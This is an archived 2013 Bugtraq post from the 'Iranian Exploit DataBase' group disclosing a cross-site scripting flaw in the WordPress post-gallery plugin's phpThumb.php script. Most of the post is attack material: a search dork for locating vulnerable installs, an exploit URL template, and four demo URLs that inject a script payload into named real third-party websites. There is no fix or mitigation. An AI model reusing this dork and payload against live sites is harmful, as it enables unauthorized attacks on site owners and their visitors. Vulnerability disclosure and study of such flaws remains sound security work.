[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Wordpress post-gallery Plugin Xss vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Wordpress post-gallery Plugin Xss vulnerabilities
- From: iedb.team@xxxxxxxxx
- Date: Sat, 24 Aug 2013 12:06:58 GMT
The Wordpress post-gallery Plugin suffers from a Cross-Site Scripting
vulnerability.
#################################
# Iranian Exploit DataBase Forum
# http://iedb.ir/acc
# http://iedb.ir
#################################
# Exploit Title : Wordpress post-gallery Plugin Xss vulnerabilities
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Email : IeDb.Team@xxxxxxxxx
# Home : http://iedb.ir - http://iedb.ir/acc
# Software Link : http://wordpress.org/
# Security Risk : High
# Tested on : Linux
# Dork : inurl:/post-gallery/thirdparty/phpthumb/
#################################
# Exploit :
#
http://site.com/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=[Xss]
# Dem0 :
http://www.knappenforeningen.no/wp/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=";><script>alert(/IeDb.Ir/)</script>
http://monsterbike.eu/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=";><script>alert(/IeDb.Ir/)</script>
http://www.yerevanmagazine.com/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=";><script>alert(/IeDb.Ir/)</script>
http://www.bambusudsalg.dk/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=";><script>alert(/IeDb.Ir/)</script>
#################################
# Tnx To : TaK.FaNaR - l4tr0d3ctism - r3d_s0urc3 - Bl4ck M4n - FαяiD
- Medrik - Achraf - Dj.TiniVini
# B3hz4d - C0dex - Beni_Vanda & All Member In Iedb.ir/acc & Iranian Hackers
#################################
# Exploit Archive = http://www.iedb.ir/exploits-411.html
#################################